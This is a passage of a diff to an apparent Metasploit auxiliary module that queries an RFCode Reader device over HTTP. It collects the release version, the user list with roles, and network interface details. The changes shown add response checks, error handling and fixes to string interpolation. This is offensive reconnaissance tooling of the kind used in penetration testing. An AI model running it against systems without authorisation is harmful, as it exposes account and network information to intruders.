vprint_good("#{rhost}:#{rport} - Release version: '#{release_ver}', Product Name: '#{product_name}'") - report_note( - :host => rhost, - :proto => 'tcp', - :port => rport, - :sname => "RFCode Reader", - :data => 'Release Version: #{release_ver}, Product: #{product_name}', - :type => 'Info' - ) + report_note( + :host => rhost, + :proto => 'tcp', + :port => rport, + :sname => "RFCode Reader", + :data => "Release Version: #{release_ver}, Product: #{product_name}", + :type => 'Info' + ) + end res = send_request_cgi( { @@ -194,19 +195,20 @@ class Metasploit3 < Msf::Auxiliary } }) - userlist = JSON.parse(res.body) - vprint_status("#{rhost}:#{rport} - Collecting user list...") - print_good("#{rhost}:#{rport} - User list & role: #{userlist}") - - report_note( - :host => rhost, - :proto => 'tcp', - :port => rport, - :sname => "RFCode Reader", - :data => 'User List & Roles: #{userlist}', - :type => 'Info' - ) + if res and res.body + userlist = JSON.parse(res.body) + vprint_status("#{rhost}:#{rport} - Collecting user list...") + vprint_good("#{rhost}:#{rport} - User list & role: #{userlist}") + report_note( + :host => rhost, + :proto => 'tcp', + :port => rport, + :sname => "RFCode Reader", + :data => "User List & Roles: #{userlist}", + :type => 'Info' + ) + end res = send_request_cgi( { @@ -219,19 +221,27 @@ class Metasploit3 < Msf::Auxiliary } }) - eth0_info = JSON.parse(res.body)["eth0"] - vprint_status("#{rhost}:#{rport} - Collecting interface info...") - print_good("#{rhost}:#{rport} - Interface eth0 info: #{eth0_info}") + if res and res.body + eth0_info = JSON.parse(res.body)["eth0"] + vprint_status("#{rhost}:#{rport} - Collecting interface info...") + vprint_good("#{rhost}:#{rport} - Interface eth0 info: #{eth0_info}") - report_note( - :host => rhost, - :proto => 'tcp', - :port => rport, - :sname => "RFCode Reader", - :data => 'Interface eth0: #{eth0_info}', - :type => 'Info' - ) + report_note( + :host => rhost, + :proto => 'tcp', + :port => rport, + :sname => "RFCode Reader", + :data => "Interface eth0: #{eth0_info}", + :type => 'Info' + ) + end + return + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{rhost}:#{rport} - HTTP Connection Failed while collecting info") + return + rescue JSON::ParserError + vprint_error("#{rhost}:#{rport} - Unable to parse JSON response while collecting info") return end end